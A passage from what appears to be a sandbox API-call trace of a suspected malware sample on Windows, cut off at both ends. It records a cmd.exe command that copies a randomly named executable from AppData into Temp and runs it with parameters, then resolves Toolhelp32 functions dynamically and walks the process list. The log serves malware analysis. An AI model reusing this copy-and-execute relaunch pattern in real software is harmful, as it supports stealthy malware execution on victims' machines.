out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"C:\\USERS\\EEBSYM5\\APPDATA\\LOCAL\\TEMP\\YAQB5ZG8.EXE\" && \"C:\\USERS\\EEBSYM5\\APPDATA\\LOCAL\\TEMP\\YAQB5ZG8.EXE\" [PARAMS]") returned 0xb1 [0093.990] CharUpperBuffW (in: lpsz="[PARAMS]", cchLength=0x8 | out: lpsz="[PARAMS]") returned 0x8 [0093.990] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"START\" \"60000\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb38*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb28 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"START\" \"60000\"", lpProcessInformation=0x12fb28*(hProcess=0xc4, hThread=0xc0, dwProcessId=0xb0c, dwThreadId=0xb10)) returned 1 [0094.000] CloseHandle (hObject=0xc4) returned 1 [0094.000] CloseHandle (hObject=0xc0) returned 1 [0094.000] Sleep (dwMilliseconds=0xfa) [0094.327] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0094.327] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CreateToolhelp32Snapshot", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0094.327] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CreateToolhelp32Snapshot", cchWideChar=24, lpMultiByteStr=0x132f63c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateToolhelp32Snapshot", lpUsedDefaultChar=0x0) returned 24 [0094.327] GetProcAddress (hModule=0x76910000, lpProcName="CreateToolhelp32Snapshot") returned 0x7694f731 [0094.327] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Heap32ListFirst", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0094.327] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Heap32ListFirst", cchWideChar=15, lpMultiByteStr=0x1312d4c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Heap32ListFirst", lpUsedDefaultChar=0x0) returned 15 [0094.327] GetProcAddress (hModule=0x76910000, lpProcName="Heap32ListFirst") returned 0x769a02e7 [0094.327] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Heap32ListNext", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0094.327] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Heap32ListNext", cchWideChar=14, lpMultiByteStr=0x1312d4c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Heap32ListNext", lpUsedDefaultChar=0x0) returned 14 [0094.327] GetProcAddress (hModule=0x76910000, lpProcName="Heap32ListNext") returned 0x769a0391 [0094.327] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Heap32First", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0094.327] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Heap32First", cchWideChar=11, lpMultiByteStr=0x1312d4c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Heap32First", lpUsedDefaultChar=0x0) returned 11 [0094.328] GetProcAddress (hModule=0x76910000, lpProcName="Heap32First") returned 0x769a0429 [0094.328] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Heap32Next", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0094.328] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Heap32Next", cchWideChar=10, lpMultiByteStr=0x1312d4c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Heap32Next", lpUsedDefaultChar=0x0) returned 10 [0094.328] GetProcAddress (hModule=0x76910000, lpProcName="Heap32Next") returned 0x769a0614 [0094.328] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Toolhelp32ReadProcessMemory", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0094.328] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Toolhelp32ReadProcessMemory", cchWideChar=27, lpMultiByteStr=0x132f63c, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Toolhelp32ReadProcessMemory", lpUsedDefaultChar=0x0) returned 27 [0094.328] GetProcAddress (hModule=0x76910000, lpProcName="Toolhelp32ReadProcessMemory") returned 0x769a0819 [0094.328] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32First", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0094.328] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32First", cchWideChar=14, lpMultiByteStr=0x1312d4c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Process32First", lpUsedDefaultChar=0x0) returned 14 [0094.328] GetProcAddress (hModule=0x76910000, lpProcName="Process32First") returned 0x7697443d [0094.328] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32Next", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0094.328] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32Next", cchWideChar=13, lpMultiByteStr=0x1312d4c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Process32Next", lpUsedDefaultChar=0x0) returned 13 [0094.328] GetProcAddress (hModule=0x76910000, lpProcName="Process32Next") returned 0x76974505 [0094.328] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32FirstW", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0094.328] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32FirstW", cchWideChar=15, lpMultiByteStr=0x1312d4c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Process32FirstW", lpUsedDefaultChar=0x0) returned 15 [0094.328] GetProcAddress (hModule=0x76910000, lpProcName="Process32FirstW") returned 0x7694fa35 [0094.328] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32NextW", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0094.328] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32NextW", cchWideChar=14, lpMultiByteStr=0x1312d4c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Process32NextW", lpUsedDefaultChar=0x0) returned 14 [0094.328] GetProcAddress (hModule=0x76910000, lpProcName="Process32NextW") returned 0x7694faca [0094.328] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32FirstW", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0094.328] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32FirstW", cchWideChar=15, lpMultiByteStr=0x1312d4c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Process32FirstW", lpUsedDefaultChar=0x0) returned 15 [0094.328] GetProcAddress (hModule=0x76910000, lpProcName="Process32FirstW") returned 0x7694fa35 [0094.328] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32NextW", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0094.328] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Process32NextW", cchWideChar=14, lpMultiByteStr=0x1312d4c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Process32NextW", lpUsedDefaultChar=0x0) returned 14 [0094.328] GetProcAddress (hModule=0x76910000, lpProcName="Process32NextW") returned 0x7694faca [0094.328] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Thread32First", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0094.328] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Thread32First", cchWideChar=13, lpMultiByteStr=0x1312d4c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Thread32First", lpUsedDefaultChar=0x0) returned 13 [0094.328] GetProcAddress (hModule=0x76910000, lpProcName="Thread32First") returned 0x76977e4c [0094.328] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Thread32Next", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.328] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Thread32Next", cchWideChar=12, lpMultiByteStr=0x1312d4c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Thread32Next", lpUsedDefaultChar=0x0) returned 12 [0094.329] GetProcAddress (hModule=0x76910000, lpProcName="Thread32Next") returned 0x76977edc [0094.329] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32First", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0094.329] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32First", cchWideChar=13, lpMultiByteStr=0x1312d4c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Module32First", lpUsedDefaultChar=0x0) returned 13 [0094.329] GetProcAddress (hModule=0x76910000, lpProcName="Module32First") returned 0x769a0859 [0094.329] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32Next", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.329] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32Next", cchWideChar=12, lpMultiByteStr=0x1312d4c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Module32Next", lpUsedDefaultChar=0x0) returned 12 [0094.329] GetProcAddress (hModule=0x76910000, lpProcName="Module32Next") returned 0x769a0942 [0094.329] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32FirstW", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0094.329] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32FirstW", cchWideChar=14, lpMultiByteStr=0x1312d4c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Module32FirstW", lpUsedDefaultChar=0x0) returned 14 [0094.329] GetProcAddress (hModule=0x76910000, lpProcName="Module32FirstW") returned 0x7694c59e [0094.329] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32NextW", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0094.329] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32NextW", cchWideChar=13, lpMultiByteStr=0x1312d4c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Module32NextW", lpUsedDefaultChar=0x0) returned 13 [0094.329] GetProcAddress (hModule=0x76910000, lpProcName="Module32NextW") returned 0x7694c11f [0094.329] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32FirstW", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0094.329] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32FirstW", cchWideChar=14, lpMultiByteStr=0x1312d4c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Module32FirstW", lpUsedDefaultChar=0x0) returned 14 [0094.329] GetProcAddress (hModule=0x76910000, lpProcName="Module32FirstW") returned 0x7694c59e [0094.329] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32NextW", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0094.329] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32NextW", cchWideChar=13, lpMultiByteStr=0x1312d4c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Module32NextW", lpUsedDefaultChar=0x0) returned 13 [0094.329] GetProcAddress (hModule=0x76910000, lpProcName="Module32NextW") returned 0x7694c11f [0094.329] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xcc [0094.334] Process32FirstW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0094.335] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0094.335] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0094.336] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0094.337] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0094.337] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0094.338] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0094.339] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0094.339] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0094.340] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0094.341] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.341] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.342] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.343] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.343] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.344] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0094.345] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.345] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.346] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0094.347] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.348] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0094.349] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0094.350] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0094.351] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0094.353] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.354] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0094.355] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0094.356] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0094.357] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0094.359] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0094.360] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0094.361] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0094.362] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0094.363] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0094.364] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0094.365] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, 